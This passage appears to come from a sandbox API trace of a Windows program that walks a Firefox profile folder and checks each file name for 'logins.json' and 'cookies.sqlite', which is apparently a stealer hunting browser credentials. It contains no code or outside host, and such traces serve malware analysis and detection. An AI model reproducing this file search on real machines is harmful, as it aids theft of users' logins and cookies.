HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.999] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.999] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.999] lstrlenW (lpString="content-prefs.sqlite") returned 20 [0160.999] GetProcessHeap () returned 0x8e0000 [0160.999] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xda) returned 0x9254f8 [0160.999] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.999] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="content-prefs.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite" [0160.999] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.999] GetProcessHeap () returned 0x8e0000 [0160.999] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0160.999] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite", lpSrch="logins.json") returned 0x0 [0160.999] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite", lpSrch="cookies.sqlite") returned 0x0 [0160.999] VirtualQuery (in: lpAddress=0x9254f8, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.000] GetProcessHeap () returned 0x8e0000 [0161.000] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254f8 | out: hHeap=0x8e0000) returned 1 [0161.000] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb5ad4bf0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb5ad4bf0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x83256a10, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="cookies.sqlite", cAlternateFileName="COOKIE~1.SQL")) returned 1 [0161.000] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.000] lstrlenW (lpString="\\") returned 1 [0161.000] GetProcessHeap () returned 0x8e0000 [0161.000] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925438 [0161.000] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.000] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.000] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.000] lstrlenW (lpString="cookies.sqlite") returned 14 [0161.000] GetProcessHeap () returned 0x8e0000 [0161.000] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xce) returned 0x8fce90 [0161.000] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.000] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="cookies.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite" [0161.000] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.000] GetProcessHeap () returned 0x8e0000 [0161.000] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0161.000] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite", lpSrch="logins.json") returned 0x0 [0161.000] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite", lpSrch="cookies.sqlite") returned="cookies.sqlite" [0161.000] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite") returned 102 [0161.000] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0x8fce90, Length=0xcc) returned 0x856f9ece [0161.000] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.000] GetProcessHeap () returned 0x8e0000 [0161.000] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.000] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbc374ed0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xbc374ed0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xbc555e20, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0x0, dwReserved1=0x0, cFileName="downloads.sqlite", cAlternateFileName="DOWNLO~1.SQL")) returned 1 [0161.074] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.074] lstrlenW (lpString="\\") returned 1 [0161.074] GetProcessHeap () returned 0x8e0000 [0161.074] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925438 [0161.074] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.075] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.075] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.075] lstrlenW (lpString="downloads.sqlite") returned 16 [0161.075] GetProcessHeap () returned 0x8e0000 [0161.075] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd2) returned 0x9254f8 [0161.075] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.075] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="downloads.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite" [0161.075] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.075] GetProcessHeap () returned 0x8e0000 [0161.075] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0161.075] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite", lpSrch="logins.json") returned 0x0 [0161.075] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite", lpSrch="cookies.sqlite") returned 0x0 [0161.075] VirtualQuery (in: lpAddress=0x9254f8, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.075] GetProcessHeap () returned 0x8e0000 [0161.075] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254f8 | out: hHeap=0x8e0000) returned 1 [0161.075] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb4b81e50, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb4b81e50, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb4b81e50, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x8d, dwReserved0=0x0, dwReserved1=0x0, cFileName="extensions.ini", cAlternateFileName="EXTENS~1.INI")) returned 1 [0161.075] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.075] lstrlenW (lpString="\\") returned 1 [0161.075] GetProcessHeap () returned 0x8e0000 [0161.075] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925438 [0161.075] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.075] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.075] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.075] lstrlenW (lpString="extensions.ini") returned 14 [0161.075] GetProcessHeap () returned 0x8e0000 [0161.075] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xce) returned 0x8fce90 [0161.075] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.075] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="extensions.ini" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini" [0161.075] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.075] GetProcessHeap () returned 0x8e0000 [0161.075] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0161.075] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini", lpSrch="logins.json") returned 0x0 [0161.076] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini", lpSrch="cookies.sqlite") returned 0x0 [0161.076] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.076] GetProcessHeap () returned 0x8e0000 [0161.076] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.076] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb45b48b0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb45b48b0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb4b0fa30, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x70000, dwReserved0=0x0, dwReserved1=0x0, cFileName="extensions.sqlite", cAlternateFileName="EXTENS~1.SQL")) returned 1 [0161.076] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.076] lstrlenW (lpString="\\") returned 1 [0161.076] GetProcessHeap () returned 0x8e0000 [0161.076] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925438 [0161.076] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.076] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.076] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.076] lstrlenW (lpString="extensions.sqlite") returned 17 [0161.076] GetProcessHeap () returned 0x8e0000 [0161.076] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd4) returned 0x9254f8 [0161.076] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.076] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="extensions.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite" [0161.076] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.076] GetProcessHeap () returned 0x8e0000 [0161.076] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0161.076] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite", lpSrch="logins.json") returned 0x0 [0161.076] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite", lpSrch="cookies.sqlite") returned 0x0 [0161.076] VirtualQuery (in: lpAddress=0x9254f8, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.076] GetProcessHeap () returned 0x8e0000 [0161.076] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254f8 | out: hHeap=0x8e0000) returned 1 [0161.076] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6ff4f30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="indexedDB", cAlternateFileName="INDEXE~1")) returned 1 [0161.076] lstrcmpiW (lpString1="indexedDB", lpString2=".") returned 1 [0161.076] lstrcmpiW (lpString1="indexedDB", lpString2="..") returned 1 [0161.076] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.076] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.076] lstrlenW (lpString="\\") returned 1 [0161.076] GetProcessHeap () returned 0x8e0000 [0161.076] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925438 [0161.076] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.077] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.077] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.077] lstrlenW (lpString="indexedDB") returned 9 [0161.077] GetProcessHeap () returned 0x8e0000 [0161.077] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc4) returned 0x9254f8 [0161.077] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.077] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="indexedDB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" [0161.077] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.077] GetProcessHeap () returned 0x8e0000 [0161.077] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0161.077] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned 97 [0161.077] lstrlenW (lpString="") returned 0 [0161.077] GetProcessHeap () returned 0x8e0000 [0161.077] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc4) returned 0x9255c8 [0161.077] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" [0161.077] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" [0161.077] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned 97 [0161.077] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned 97 [0161.077] lstrlenW (lpString="\\*.*") returned 4 [0161.077] GetProcessHeap () returned 0x8e0000 [0161.077] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xcc) returned 0x8fce90 [0161.077] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" [0161.077] lstrcatW (in: 